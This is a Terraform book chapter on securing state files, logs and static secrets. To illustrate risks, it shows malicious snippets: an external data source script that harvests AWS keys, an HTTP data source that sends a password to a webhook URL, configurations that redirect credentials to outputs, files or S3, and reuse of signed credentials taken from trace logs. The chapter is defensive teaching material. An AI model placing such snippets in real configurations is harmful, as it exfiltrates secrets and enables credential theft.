13 Security and secrets management

This chapter covers

  • Securing state and log files
  • Managing static and dynamic secrets
  • Enforcing “policy as code” with Sentinel

On July 25, 2019, the Democratic Senatorial Campaign Committee (DSCC) was discovered to have exposed over 6.2 million email addresses. It was one of the largest accidental data exposures of its kind. The vast majority of exposed email addresses belonged to average Americans, although thousands of university, government, and military personnel’s emails were leaked as well. The root cause of the incident was a publicly accessible S3 bucket. Anyone with an Amazon Web Services (AWS) account could access the emails stored in a spreadsheet named EmailExcludeClinton.csv. At the time of the discovery, the data had been exposed for at least nine years, based on the last-modified date of 2010.

This cautionary tale should serve as a warning to anyone who fails to take information security seriously. Data breaches are enormously detrimental, not only to the public but to corporations as well. Loss of brand reputation, loss of revenue, and government-imposed fines are just some of the potential consequences. Vigilance is required because all it takes for a data breach to occur is a slight oversight, such as an improperly configured S3 bucket that hasn’t been used for years.

Security is everybody’s responsibility. But as a Terraform developer, your share of the responsibility is greater than most. Terraform is an infrastructure provisioning technology and therefore handles a lot of secrets—more than most people realize. Secrets like database passwords, personal identification information (PII), and encryption keys may all be consumed and managed by Terraform. Worse, many of these secrets appear as plaintext, either in Terraform state or in log files. Knowing how and where secrets have the potential to be leaked is critical to developing an effective counter-strategy. You have to think like a hacker to protect yourself from a hacker.

Secrets management is about keeping your secret information secret. Best practices for secrets management with Terraform, as we discuss in this chapter, include the following:

  • Securing state files

  • Securing logs

  • Managing static secrets

  • Dynamic just-in-time secrets

  • Enforcing “policy as code” with Sentinel

13.1 Securing Terraform state

Sensitive information will inevitably find its way into Terraform state pretty much no matter what you do. Terraform is fundamentally a state-management tool, so to perform basic execution tasks like drift detection, it needs to compare previous state with current state. Terraform does not treat attributes containing sensitive data any differently than it treats non-sensitive attributes. Therefore, any and all sensitive data is put in the state file, which is stored as plaintext JSON. Because you can’t prevent secrets from making their way into Terraform state, it’s imperative that you treat the state file as sensitive and secure it accordingly. In this section, we discuss three methods for securing state files:

  • Removing unnecessary secrets from Terraform state

  • Least-privileged access control

  • Encryption at rest

13.1.1 Removing unnecessary secrets from Terraform state

Although you ultimately cannot keep secrets from finding their way into Terraform state, there’s no excuse for complacency. You should never expose more sensitive information than is absolutely required. If the worst were to happen and, despite your best efforts and safety precautions, the contents of your state file were leaked, it is better to expose one secret than a dozen (or a hundred).

Tip Fewer secrets means you have less to lose in the event of a data breach.

To minimize the number of secrets stored in Terraform state, you first have to know what can be stored in Terraform state. Fortunately, it’s not a long list. Only three configuration blocks can store stateful information (sensitive or otherwise) in Terraform: resources, data sources, and output values. Other kinds of configuration blocks (providers, input variables, local values, modules, etc.) do not store stateful data. Any of these other blocks may leak sensitive information in other ways, but at least you do not need to worry about them saving sensitive information to the state file.

Now that you know which blocks have the potential to store sensitive information in Terraform, you have to determine which secrets are necessary and which are not. Much of this depends on the level of risk you are willing to accept and the kinds of resources you are managing with Terraform. An example of a necessary secret is shown next. This code declares a Relational Database Service (RDS) database instance and passes in two secrets: var.username and var.password. Since both of these attributes are defined as required, if you want Terraform to provision an RDS database, you must be willing to accept that your master username and password secret values exist in Terraform state:

resource "aws_db_instance" "database" {
  allocated_storage    = 20
  engine               = "postgres"
  engine_version       = "9.5"
  instance_class       = "db.t3.medium"
  name                 = "ptfe"
  username             = var.username           
  password             = var.password           
}

username and password are attributes of the aws_db_instance resource. These are necessary secrets because it is impossible to provision this resource without storing the values in Terraform state.

Note Defining your variables as sensitive does not prevent them from being stored in Terraform state.

The following listing shows Terraform state for a deployed RDS instance. Notice that username and password appear in plaintext.

Listing 13.1 aws_db_instance in Terraform state

{
    "mode": "managed",
    "type": "aws_db_instance",
    "name": "database",
    "provider": "provider.aws",
    "instances": [
      {
        "schema_version": 1,
        "attributes": {
         //not all attributes are shown 
          "password": "hunter2",                                  
          "performance_insights_enabled": false,
          "performance_insights_kms_key_id": "",
          "performance_insights_retention_period": 0,
          "port": 5432,
          "publicly_accessible": false,
          "replicas": [],
          "replicate_source_db": "",
          "resource_id": "db-O6TUYBMS2HGAY7GKSLTL5H4JEM",
          "s3_import": [],
          "security_group_names": null,
          "skip_final_snapshot": false,
          "snapshot_identifier": null,
          "status": "available",
          "storage_encrypted": false,
          "storage_type": "gp2",
          "tags": null,
          "timeouts": null,
          "timezone": "",
          "username": "admin"                                     
        }
      }
    ]
}

username and password appear as plaintext in Terraform state.

Setting secrets on a database instance may be unavoidable, but there are plenty of avoidable situations. For example, you should never pass the RDS database username and password to a Lambda function as environment variables. Consider the following code, which declares an aws_lambda_function resource that has username and password set as environment variables.

Listing 13.2 Lambda function configuration code

resource "aws_lambda_function" "lambda" {
  filename      = "code.zip"
  function_name = "${local.namespace}-lambda"
  role          = aws_iam_role.lambda.arn
  handler       = "exports.main"
 
  source_code_hash = filebase64sha256("code.zip")
  runtime = "nodejs12.x"
 
  environment {
    variables = {
      USERNAME = var.username      
      PASSWORD = var.password      
    }
  }
}

RDS database username and password set as environment variables

Since the environment block of aws_lambda_function contains these values, they will be stored in state just as they were for the database. The difference is that while the RDS database required username and password to be set, the AWS Lambda function does not. The Lambda function only needs credentials to connect to the database instance at runtime.

You might think this is excessive and possibly redundant. After all, if you are declaring the RDS instance in the same configuration code as your AWS Lambda function, wouldn’t the sensitive information be stored in Terraform state regardless? And you would be right. But you would also be exposing yourself to additional vulnerabilities outside of Terraform. If you aren’t familiar with AWS Lambda, environment variables on Lambda functions are exposed to anyone with read access to that resource (see figure 13.1).

Figure 13.1 Environment variables for AWS Lambda functions are visible to anyone with read access in the console. Avoid setting secrets as environment variables in AWS Lambda whenever possible.

Granted, people with read access to your AWS account tend to be coworkers and trusted contractors, but do you really want to risk exposing sensitive information that way? I recommend adopting a zero-trust policy, even within your team. A better solution would be to read secrets dynamically from a centralized secrets store.

We can remove USERNAME and PASSWORD from the environment block by replacing them with a key that tells AWS Lambda where to find the secrets, such as AWS Secrets Manager. AWS Secrets Manager is a secret store not unlike Vault (Azure and Google Cloud Platform [GCP] have equivalents). To use AWS Secrets Manager, we will need to give permissions to Lambda to read from Secrets Manager and add a few lines of boilerplate to the Lambda source code. This will prevent secrets from showing up in the state file and prevent other avenues of sensitive information leakage, such as through the AWS console.

Why not RDS Proxy?

RDS Proxy is a managed service that allows proxy targets to pool database connections. It’s currently the best way to connect AWS Lambda to RDS. However, since this service uses AWS Secrets Manager under the hood, and since it’s not a generalized solution that can work with any kind of secret, we will not use it in this chapter.

The following listing shows aws_lambda_function refactored to use a SECRET_ID pointing to a secret stored in AWS Secrets Manager.

Listing 13.3 Lambda function configuration code

resource "aws_lambda_function" "lambda" {
  filename      = "code.zip"
  function_name = "${local.namespace}-lambda"
  role          = aws_iam_role.lambda.arn
  handler       = "exports.main"
 
  source_code_hash = filebase64sha256("code.zip")
  runtime = "nodejs12.x"
 
  environment {
    variables = {
      SECRET_ID = var.secret_id           
    }
  }
}

No more secrets in the configuration code! This is an ID for where to fetch the secrets.

Now, in the application source code, SECRET_ID can be used to fetch the secret at runtime (see listing 13.4).

Note For this to work, AWS Lambda needs to be given permission to fetch the secret value from AWS Secrets Manager.
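
One minimal way to grant that permission is an inline policy attached to the Lambda’s execution role. The following is a rough sketch rather than the book’s code: secretsmanager:GetSecretValue is the only action required, and var.secret_arn (the ARN of the secret) is an assumed input variable.

resource "aws_iam_role_policy" "lambda_read_secret" {
  name = "${local.namespace}-read-secret"
  role = aws_iam_role.lambda.id

  policy = jsonencode({
    Version = "2012-10-17"
    Statement = [
      {
        Effect   = "Allow"
        Action   = ["secretsmanager:GetSecretValue"]
        Resource = var.secret_arn # ARN of the secret in AWS Secrets Manager (assumed variable)
      }
    ]
  })
}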

Listing 13.4 Lambda function source code

package main
 
import (
    "context"
    "fmt"
    "os"
 
    "github.com/aws/aws-lambda-go/lambda"
    "github.com/aws/aws-sdk-go/aws"

    "github.com/aws/aws-sdk-go/aws/session"
    "github.com/aws/aws-sdk-go/service/secretsmanager"
)

func HandleRequest(ctx context.Context) error {
    client := secretsmanager.New(session.New())
    config := &secretsmanager.GetSecretValueInput{
        SecretId: aws.String(os.Getenv("SECRET_ID")),
    }
    val, err := client.GetSecretValue(config)             
    if err != nil {
        return err
    }
 
    // do something with secret value
    fmt.Printf("Secret is: %s", *val.SecretString)
 
    return nil
}
 
func main() {
    lambda.Start(HandleRequest)
}

Fetches the secret dynamically by ID

We formally introduce AWS Secrets Manager later when we talk about managing dynamic secrets in Terraform.

13.1.2 Least-privileged access control

Removing unnecessary secrets is always a good idea, but it won’t prevent your state file from being exposed in the first place. To do that, you need to treat the state file as secret and gate who has access to it. After all, you don’t want just anyone accessing your state file. Users should only be able to access state files that they need access to. In general, a principle of least privilege should be upheld, meaning users and service accounts should have only the minimal privileges required to do their jobs.

In chapter 6, we did exactly this when we created a module for deploying an S3 backend. As part of that module, we restricted access to the S3 bucket to just the principals that required it. The S3 bucket holds the state files, and although a given user may need read/write access to some state files, they rarely need access to all of them. The next listing shows an example of the policy we created for enabling least-privileged access.

Listing 13.5 IAM least-privileged policy for the S3 backend

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "",
            "Effect": "Allow",
            "Action": "s3:ListBucket",
            "Resource": "arn:aws:s3:::tia-state-bucket"
        },
        {
            "Sid": "",
            "Effect": "Allow",
            "Action": [
                "s3:PutObject",
                "s3:GetObject"
            ],
            "Resource": "arn:aws:s3:::tia-state-bucket/team1/*"     
        },
        {
            "Sid": "",
            "Effect": "Allow",
            "Action": [
                "dynamodb:PutItem",
                "dynamodb:GetItem",
                "dynamodb:DeleteItem"
            ],
            "Resource": 
                "arn:aws:dynamodb:us-west-2:215974853022:table/tia-state-lock"
        }
    ]
}

Object access is scoped to the team1/ prefix; the ListBucket statement could be similarly restricted with a prefix condition if desired.

Terraform Cloud and Terraform Enterprise allow you to restrict user access to state files with team access settings. The basic idea is that users are added to teams, and the teams grant read/write/admin access to specific workspaces and their associated state files. People who are not on an authorized team will be unable to read the state file. For more information about how teams and team access work, refer to the official HashiCorp documentation (http://mng.bz/0r4p).
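
If you manage Terraform Cloud or Terraform Enterprise itself with Terraform, the same team-to-workspace mapping can be expressed in code using the tfe provider. The following is a rough sketch with illustrative names; it assumes a tfe_workspace.team1 resource declared elsewhere, and argument details may vary between provider versions.

resource "tfe_team" "team1" {
  name         = "team1"
  organization = "my-org" # illustrative organization name
}

resource "tfe_team_access" "team1_state" {
  access       = "write" # one of read/plan/write/admin
  team_id      = tfe_team.team1.id
  workspace_id = tfe_workspace.team1.id # assumes a workspace declared elsewhere
}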

TIP In addition to securing state files, you can create least-privileged deployment roles for users and service accounts. We did this in chapter 12 with the helloworld.json policy.

13.1.3 Encryption at rest

Encryption at rest is the act of translating data into a format that cannot be decrypted except by authorized users (see figure 13.2). Even if a malicious user were to gain physical access to the machines storing encrypted data, the data would be useless to them.

Figure 13.2 Data must be encrypted every step of the way. Most Terraform backends take care of data in transit, but you are responsible for ensuring that data is encrypted at rest.

What about encryption in transit?

Encrypting data in transit is just as important as encrypting data at rest. Encrypting data in transit means protecting against network traffic eavesdropping. The standard way to do this is to ensure that data is exclusively transmitted over SSL/TLS, which is enabled by default for most backends including S3, Terraform Cloud, and Terraform Enterprise. This isn’t true for some backends, such as the HTTP backend, which is why you should avoid using it. No matter what backend you choose, it’s your responsibility to ensure that data is protected both at rest and in transit.

Encryption at rest is easy to enable for most backends. If you are using an S3 backend like the one we created in chapter 6, you can enable server-side encryption of the state object and optionally specify a customer-managed Key Management Service (KMS) key, or just let S3 use its default encryption key. If you are using Terraform Cloud or Terraform Enterprise, your data is automatically encrypted at rest by default. In fact, it’s double encrypted: once with KMS and again with Vault. For other remote backends, you will need to consult the documentation to learn how to enable encryption at rest.
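
For the S3 backend, that might look something like the following sketch. The bucket, key, table, and KMS key ARN are placeholders; encrypt = true turns on server-side encryption of the state object, and kms_key_id selects a customer-managed KMS key instead of the S3 default key.

terraform {
  backend "s3" {
    bucket         = "tia-state-bucket"
    key            = "team1/terraform.tfstate"
    region         = "us-west-2"
    dynamodb_table = "tia-state-lock"
    encrypt        = true                                             # server-side encryption of the state object
    kms_key_id     = "arn:aws:kms:us-west-2:111111111111:key/example" # illustrative customer-managed key
  }
}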

Why not scrub secrets from Terraform state?

There has been much discussion in the community of scrubbing (removing) secrets from Terraform before they are stored in Terraform state. One experiment that has been tried lets users provide a PGP key to encrypt sensitive information before it is stored in the state file. This method has been deprecated in newer versions of Terraform, primarily because it is hard for Terraform to interpolate values that are not stored in plaintext. Also, if the PGP key were to be lost (which happens more often than you think), your state file would be as good as gone. Nowadays, using a remote backend with encryption at rest is the recommended approach.

13.2 Securing logs

Insecure log files pose an enormous security risk—but, surprisingly, many people aren’t aware of the danger. By reading Terraform log files, malicious users can glean sensitive information about your deployment, such as credentials and environment variables, and use them against you (see figure 13.3). In this section, we discuss how sensitive information can be leaked through insecure log files and what you can do to prevent it.

Figure 13.3 A malicious user can steal credentials from log files to make unauthorized API calls to AWS.

13.2.1 What sensitive information?

People are often shocked to learn that sensitive information appears in log files. The official documentation and online blog articles focus on the importance of securing the state file, but little is said about the importance of securing logs. Let’s look at an example of how secrets can be leaked in logs. Consider the following configuration code snippet, which declares a simple “Hello World!” EC2 instance:

resource "aws_instance" "helloworld" {
    ami = var.ami_id
    instance_type = "t2.micro"
    tags = {
      Name = "HelloWorld"
    }
}

If you were to create this resource without enabling trace logging, the logs would be short and relatively uninteresting:

$ terraform apply -auto-approve
aws_instance.helloworld: Creating...
aws_instance.helloworld: Still creating... [10s elapsed]
aws_instance.helloworld: Still creating... [20s elapsed]
aws_instance.helloworld: Creation complete after 24s [id=i-002030c2b40edd6bb]
 
Apply complete! Resources: 1 added, 0 changed, 0 destroyed.

On the other hand, if you were to run the same configuration code with trace logs enabled (TF_LOG=trace), you would find information in the logs about the current caller identity, temporary signed access credentials, and response data from all requests made to deploy the EC2 instance. The following listing shows an excerpt.

Listing 13.6 sts:GetCallerIdentity in trace level logs

Trying to get account information via sts:GetCallerIdentity
[aws-sdk-go] DEBUG: Request sts/GetCallerIdentity Details:
---[ REQUEST POST-SIGN ]-----------------------------
POST / HTTP/1.1
Host: sts.amazonaws.com
User-Agent: aws-sdk-go/1.30.16 (go1.13.7; darwin; amd64) APN/1.0 
HashiCorp/1.0 Terraform/0.12.24 (+https://www.terraform.io)
Content-Length: 43
Authorization: AWS4-HMAC-SHA256
Credential=AKIATESI2XGPMMVVB7XL/20200504/us-east-1/sts/aws4_request,
SignedHeaders=content-length;content-type;host;x-amz-date,
Signature=c4df301a200eb46d278ce1b6b9ead1cfbe64f045caf9934a14e9b7f8c207c3f8
Content-Type: application/x-www-form-urlencoded; charset=utf-8
X-Amz-Date: 20200504T084221Z
Accept-Encoding: gzip
Action=GetCallerIdentity&Version=2011-06-15
-----------------------------------------------------
[aws-sdk-go] DEBUG: Response sts/GetCallerIdentity Details:
---[ RESPONSE ]--------------------------------------
HTTP/1.1 200 OK
Connection: close
Content-Length: 405
Content-Type: text/xml
Date: Mon, 04 May 2020 07:37:21 GMT
X-Amzn-Requestid: 74b2886b-43bc-475c-bda3-846123059142
-----------------------------------------------------
[aws-sdk-go] <GetCallerIdentityResponse xmlns="https://sts.amazonaws.com/doc/2011-06-15/">
  <GetCallerIdentityResult>
    <Arn>arn:aws:iam::215974853022:user/swinkler</Arn>                     
    <UserId>AIDAJKZ3K7CTQHZ5F4F52</UserId>                                 
    <Account>215974853022</Account>                                        
  </GetCallerIdentityResult>
  <ResponseMetadata>
    <RequestId>74b2886b-43bc-475c-bda3-846123059142</RequestId>
  </ResponseMetadata>
</GetCallerIdentityResponse>

Temporary signed credentials that can be used to make a request on your behalf

Information about the current caller identity

The temporary signed credentials that appear in the trace logs can be used to make authorized API requests (at least until they expire, which is in about 15 minutes).

The next listing demonstrates using the previous credentials to make a curl request and the response from the server.

Listing 13.7 Invoking sts:GetCallerIdentity with signed credentials

$ curl -L -X POST 'https://sts.amazonaws.com' \
  -H 'Host: sts.amazonaws.com' \
  -H 'Authorization: AWS4-HMAC-SHA256
Credential=AKIATESI2XGPMMVVB7XL/20200504/us-east-1/sts/aws4_request,
SignedHeaders=content-length;content-type;host;x-amz-date,
Signature=c4df301a200eb46d278ce1b6b9ead1cfbe64f045caf9934a14e9b7f8c207c3f8' \
  -H 'Content-Type: application/x-www-form-urlencoded; charset=utf-8' \
  -H 'X-Amz-Date: 20200504T084221Z' \
  -H 'Accept-Encoding: gzip' \
  --data-urlencode 'Action=GetCallerIdentity' \
  --data-urlencode 'Version=2011-06-15'
 
<GetCallerIdentityResponse xmlns="https://sts.amazonaws.com/doc/2011-06-15/">
  <GetCallerIdentityResult>
    <Arn>arn:aws:iam::215974853022:user/swinkler</Arn>
    <UserId>AIDAJKZ3K7CTQHZ5F4F52</UserId>
    <Account>215974853022</Account>
  </GetCallerIdentityResult>
  <ResponseMetadata>
    <RequestId>e6870ff6-a09e-4479-8860-c3ca08b323b5</RequestId>
  </ResponseMetadata>
</GetCallerIdentityResponse>

I know what you might be thinking: who cares if someone can invoke sts:GetCallerIdentity? It’s not a particularly sensitive API to begin with. But sts:GetCallerIdentity is just the beginning! Every API call that Terraform makes to AWS appears in the trace logs, along with the complete request and response objects. That means for the “Hello World!” deployment, signed credentials allowing someone to invoke ec2:RunInstances and ec2:DescribeVpcs appear as well. Granted, these are temporary credentials that expire in 15 minutes, but risks are risks!

TIP Always turn off trace logging except when debugging.

13.2.2 Dangers of local-exec provisioners

In chapter 7, we introduced local-exec provisioners and how they can be used to execute commands on a local machine during terraform apply and terraform destroy. As previously mentioned, local-exec provisioners are inherently dangerous and should be avoided whenever possible. Now I will give you one more reason to be wary of them: even when trace logging is disabled, local-exec provisioners can be used to print secrets in the log files.

Consider this snippet, which declares a null_resource with an attached local-exec provisioner:

resource "null_resource" "uh_oh" {
  provisioner "local-exec" {
    command = <<-EOF
        echo "access_key=$AWS_ACCESS_KEY_ID"
        echo "secret_key=$AWS_SECRET_ACCESS_KEY"
    EOF
    }
}

If you ran this, you would see the following during terraform apply (even when trace logging is disabled):

$ terraform apply -auto-approve
null_resource.uh_oh: Creating...
null_resource.uh_oh: Provisioning with 'local-exec'...
null_resource.uh_oh (local-exec): Executing: ["/bin/sh" "-c" "echo \"access_key=$AWS_ACCESS_KEY_ID\"\necho \"secret_key=$AWS_SECRET_ACCESS_KEY\"\n"]
null_resource.uh_oh (local-exec): access_key=ASIAQHUM6YXTDSEUEMUJ
null_resource.uh_oh (local-exec): secret_key=ILjkhTbflyPdxkvWJl9NV8qZXPJ+yVM3JSq3Uaz1
null_resource.uh_oh: Creation complete after 0s [id=5973892021553480485]
 
Apply complete! Resources: 1 added, 0 changed, 0 destroyed.

AWS access key

AWS secret access key

Note AWS access keys are not the only things local-exec provisioners can expose. Any secret stored on the machine running Terraform is at risk.

13.2.3 Dangers of external data sources

Somewhat related to local-exec provisioners are external data sources. In case you aren’t aware of these dodgy characters, external data sources allow you to execute arbitrary code and return the results to Terraform. That sounds great at first because you can create custom data sources without resorting to writing your own Terraform provider. The downside is that any arbitrary code can be called, which can be extremely troublesome if you are not careful (see figure 13.4).

Figure 13.4 External data sources execute arbitrary code (such as Python, JavaScript, Bash, etc.) and return the results to Terraform. If the code is malicious, it can cause all sorts of problems before you have a chance to do anything about it.

TIP If you are interested in creating custom resources without writing your own provider, I recommend using the Shell provider for Terraform (https://github.com/scottwinkler/terraform-provider-shell; see appendix D).

External data sources are particularly nefarious because they run during terraform plan, which means all a malicious user would need to do to gain access to all your secrets is sneak this code into your configuration and make sure terraform plan is run. No apply is required.

TIP Always skim through any module you want to use, even if it comes from the official module registry, to ensure that no malicious code is present.

Consider this code, which doesn’t look that bad at first glance:

data "external" "do_bad_stuff" {
  program = ["node", "${path.module}/run.js"]
}

During terraform plan, this data source could run a Node.js script to execute malicious code. Here’s an example of what the external script might do:

// runKeyLogger()
// stealBankingInformation()
// emailNigerianPrince()
console.log(JSON.stringify({
    AWS_ACCESS_KEY_ID: process.env.AWS_ACCESS_KEY_ID,
    AWS_SECRET_ACCESS_KEY: process.env.AWS_SECRET_ACCESS_KEY,
}))

When this code runs, it can do anything from installing viruses to stealing your private data to mining bitcoins. In this example, the code just returns a JSON object with the AWS access and secret access keys in tow (which is still nasty!). If you were to run this, nothing of interest would show up in the logs:

$ terraform apply -auto-approve
data.external.do_bad_stuff: Refreshing state...
 
Apply complete! Resources: 0 added, 0 changed, 0 destroyed.

But in your state file, the data would appear in plaintext:

$ terraform state show data.external.do_bad_stuff
# data.external.do_bad_stuff:
data "external" "do_bad_stuff" {
    id      = "-"
    program = [
        "node",
        "./run.js",
    ]
    result  = {
       "AWS_ACCESS_KEY_ID" = "ASIAQHUM6YXTDSEUEMUJ"
       "AWS_SECRET_ACCESS_KEY" = "ILjkhTbflyPdxkvWJl9NV8qZXPJ+yVM3JSq3Uaz1"
    }
} 

That’s not the end of it. The sensitive information could also appear in the logs, if trace logging were enabled:

JSON output: [123 34 65 87 83 95 65 67 67 69 83 83 95 75 69 89 95 73 68 34 
58 34 65 83 73 65 81 72 85 77 54 89 88 84 68 83 69 85 69 77 85 74 34 44 34 
65 87 83 95 83 69 67 82 69 84 95 65 67 67 69 83 83 95 75 69 89 34 58 34 73 
76 106 107 104 84 98 102 108 121 80 100 120 107 118 87 74 108 57 78 86 56 
113 90 88 80 74 43 121 86 77 51 74 83 113 51 85 97 122 49 34 125 10]

Converting this byte array to a string yields the following JSON string:

{
    "AWS_ACCESS_KEY_ID": "ASIAQHUM6YXTDSEUEMUJ",
    "AWS_SECRET_ACCESS_KEY": "ILjkhTbflyPdxkvWJl9NV8qZXPJ+yVM3JSq3Uaz1"
}

Note External data sources are perhaps the most dangerous resources in all of Terraform. Be extremely judicious with their use, as there are many clever and devious ways that sensitive information could be leaked with them.

13.2.4 Dangers of the HTTP provider

The HTTP provider is a utility provider for interacting with generic HTTP servers as part of a Terraform configuration. It exposes a single data source, http, which makes a GET request to a given URL and exports information about the response. This data source is meant merely to fetch data, but it can easily be abused to steal sensitive information, much like the external data source. For example, you could make a GET request with a query string parameter that smuggles out sensitive information. Effectively, whoever owns the API gets their hands on your sensitive information whenever terraform plan is run:

variable "password" {
  type      = string
  sensitive = true
  default   = "hunter2"
}
 
data "http" "password" {
  url = "https://webhook.site/440255d9?pw=${var.password}"     
 
  request_headers = {
    Accept = "application/json"
  }
}

Performs a GET with your password against a custom API

13.2.5 Restricting access to logs

Many of the same rules for securing state files also apply to log files: you don’t want people reading log files if it’s not required to do their job, and you want to encrypt data at rest and in transit so there is no possibility of hackers or eavesdroppers gaining access to your data. Here are some additional guidelines specific to securing log files:

  • Do not allow unauthorized users to run plan or apply against your workspace.

  • Turn off trace-level logging except when debugging.

  • If you have continuous integration webhooks set up on a repository, do not allow terraform plan to be run from pull requests (PRs) initiated from forks. Otherwise, attackers could use external or HTTP data sources to exfiltrate secrets without any of their code ever being merged.

TIP Relax, I’m not trying to scare you. Not many people know about these exploits, and of the few who do, probably none have reason to cause you harm. Use your best judgment, and don’t take any unnecessary risks.

13.3 Managing static secrets

Static secrets are sensitive values that do not change, or at least do not change often. Most secrets can be classified as static secrets. Usernames and passwords, long-lived OAuth tokens, and config files containing credentials are all examples of static secrets. In this section, we discuss some of the different ways to manage static secrets and give an overview of how to effectively rotate them.

13.3.1 Environment variables

There are two major ways to pass static secrets into Terraform: as environment variables and as Terraform variables. I recommend passing secrets as environment variables whenever possible because it is far safer than the alternative. Environment variables do not show up in the state or plan files, and it’s harder for malicious users to access your sensitive values as compared to Terraform variables. In the previous section, we discussed how environment variables could be leaked with local-exec provisioners, external data sources, and the HTTP provider, but these risks can be mitigated with careful code reviews or Sentinel policies (as we will see in section 13.5).

As safe as environment variables tend to be, with few exceptions they can only be used to configure secrets in Terraform providers. A few rare resources can read values from the environment as well, and their documentation will say so if you come across one.

Note As discussed in chapter 12, it’s possible to set Terraform variables with environment variables, but this does not help from a security point of view.

When configuring a Terraform provider, you definitely do not want to pass sensitive information as regular Terraform variables:

provider "aws" {
  region     = "us-west-2"
  access_key = var.access_key      
  secret_key = var.secret_key      
}

A very bad idea!

Configuring sensitive information in providers with Terraform variables is inherently dangerous because it opens you up to the possibility of someone redirecting secrets and using them elsewhere. Consider how easy it is for someone to output the AWS access and secret access keys simply by adding the following lines to the configuration code:

output "aws" {
    value = {
        access_key = var.access_key,
        secret_key = var.secret_key
    }
}

Another possibility is saving the contents to a local_file resource:

resource "local_file" "aws" {
  filename = "credentials.txt"
  content = <<-EOF
  access_key = ${var.access_key}
  secret_key = ${var.secret_key}
  EOF
}

or even uploading to an S3 bucket:

resource "aws_s3_bucket_object" "aws" {
  key     = "creds.txt"
  bucket  = var.bucket_name
  content = <<-EOF
  access_key = ${var.access_key}
  secret_key = ${var.secret_key}
  EOF
}

As you can see, it doesn’t take a genius to be able to read sensitive information from Terraform variables. The avenues of attack are so numerous that it’s nearly impossible to develop an effective governance strategy. Anyone with access to modify your configuration code or run plan and apply on your workspace can easily steal secret values.

The recommended approach is therefore to configure providers using environment variables:

provider "aws" {
  region = "us-west-2"     
}

The access key and secret key are set as environment variables instead of Terraform variables.

It’s worth mentioning that some providers allow you to set secret information in other ways, such as through a config file. This works fine for most use cases but can be a little awkward when running Terraform in automation. You should also be aware that nothing on your machine is truly secret, config files included. Consider the following code, which declares a local_file data source to read data from an AWS credentials file:

data "local_file" "credentials" {
    filename = "/Users/Admin/.aws/credentials"
}

I know this example is a bit contrived, and I doubt you will ever encounter this exact situation yourself, but it is something to be aware of, nonetheless. Just because a file is “hidden” on your filesystem doesn’t mean Terraform can’t access it (see figure 13.5).

Figure 13.5 No secret is safe from the prying eye of Terraform.

Warning Malicious Terraform code can access any secret stored on a local machine running Terraform!

13.3.2 Terraform variables

Despite all the shortcomings of Terraform variables, sometimes you do not have a choice in the matter. Recall the database instance we declared earlier:

resource "aws_db_instance" "database" {
  allocated_storage    = 20
  engine               = "postgres"
  engine_version       = "9.5"
  instance_class       = "db.t3.medium"
  name                 = "ptfe"
  username             = var.username           
  password             = var.password           
}

Cannot be set from environment variables

If you wish to deploy an RDS database, you are stuck setting username and password as Terraform variables, since there is no option for using environment variables. In this case, you can still use Terraform variables to set sensitive information as long as you are smart about it.

First, I recommend running Terraform in automation, if you are not already doing so. It is imperative to maintain a single source of truth for your configuration code and Terraform state. You do not want people deploying Terraform from their local machines, even if they are using a remote backend like S3. By ensuring that Terraform runs are always linked to a specific Git commit, you prevent troublemakers from inserting malicious code without leaving behind incriminating evidence in the Git history.

After running Terraform in automation, you should seek to isolate sensitive Terraform variables from non-sensitive ones. Terraform Cloud and Terraform Enterprise make this easy because they let you mark variables as sensitive when creating them through the UI or API. Figure 13.6 shows this in action.

Figure 13.6 Terraform variables can be marked as sensitive by clicking the Sensitive check box.

If you aren’t using Terraform Cloud or Terraform Enterprise, you will have to segregate sensitive Terraform variables yourself. One way to accomplish this is by deploying workspaces with multiple variable-definition files. Terraform does not automatically load variable-definition files with any name other than terraform.tfvars, but you can specify other files using the -var-file flag. For instance, if you have non-sensitive data stored in production.tfvars (possibly checked into Git) and sensitive data stored in secrets.tfvars (definitely not checked into Git), the following command will do the trick:

$ terraform apply \
  -var-file="secrets.tfvars" \
  -var-file="production.tfvars"

13.3.3 Redirecting sensitive Terraform variables

Sensitive variables can be defined by setting the sensitive argument to true:

variable "password" {
  type      = string
  sensitive = true
}

Variables defined as sensitive appear in Terraform state but are redacted from CLI output. Consider the following code, which declares a sensitive variable and attempts to print it out with a local-exec provisioner:

variable "password" {
  type      = string
  sensitive = true
  default   = "hunter2"
}
 
resource "null_resource" "safe" {
  provisioner "local-exec" {
    command = "echo ${var.password}"
  }
}

This code behaves as expected, with the output being suppressed from CLI output:

$ terraform apply -auto-approve
null_resource.safe: Creating...
null_resource.safe: Provisioning with 'local-exec'...
null_resource.safe (local-exec): (output suppressed due to sensitive value 
in config)
null_resource.safe (local-exec): (output suppressed due to sensitive value 
in config)
null_resource.safe: Creation complete after 0s [id=3800487680631318804]
 
Apply complete! Resources: 1 added, 0 changed, 0 destroyed.

Defining a variable as sensitive prevents users from accidentally exposing secrets but does not stop motivated individuals.

Consider instead the following code, which redirects var.password to a local_file resource before reading it back and printing it with a local-exec provisioner:

variable "password" {
  type      = string
  sensitive = true
  default   = "hunter2"
}
 
resource "local_file" "password" {                            
  filename = "password.txt"
  content  = var.password
}
 
data "local_file" "password" {
  filename = local_file.password.filename                     
}
 
resource "null_resource" "uh_oh" {
  provisioner "local-exec" {
    command = "echo ${data.local_file.password.content}"      
  }
}

Redirects a secret to a local file

Reads the secret from the local file

Prints the redirected secret

You might be surprised to learn that the sensitive value is not obfuscated in the logs:

$ terraform apply -auto-approve
local_file.password: Creating...
local_file.password: Creation complete after 0s [id=f3bbbd66a63d4bf1747940578ec3d0103530e21d]
data.local_file.password: Reading...
data.local_file.password: Read complete after 0s [id=f3bbbd66a63d4bf1747940578ec3d0103530e21d]
null_resource.uh_oh: Creating...
null_resource.uh_oh: Provisioning with 'local-exec'...
null_resource.uh_oh (local-exec): Executing: ["/bin/sh" "-c" "echo hunter2"]
null_resource.uh_oh (local-exec): hunter2 
null_resource.uh_oh: Creation complete after 0s [id=4946082416658079188]
 
Apply complete! Resources: 2 added, 0 changed, 0 destroyed.

This is because Terraform does not simply perform a find-and-replace to scrub secret values from its output: it suppresses values based on references to sensitive variables. If you route a secret through an intermediary, Terraform loses track of the reference, and the value is no longer suppressed the way it is supposed to be.

Besides local-exec provisioners, there are many other ways to redirect sensitive variables. As mentioned before, you can upload to an S3 bucket, use an external data source, or use an HTTP data source.

TIP Despite the security limitations of sensitive variables, I recommend using them whenever possible. Using them makes it much more difficult to print variables compared to not using them.
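
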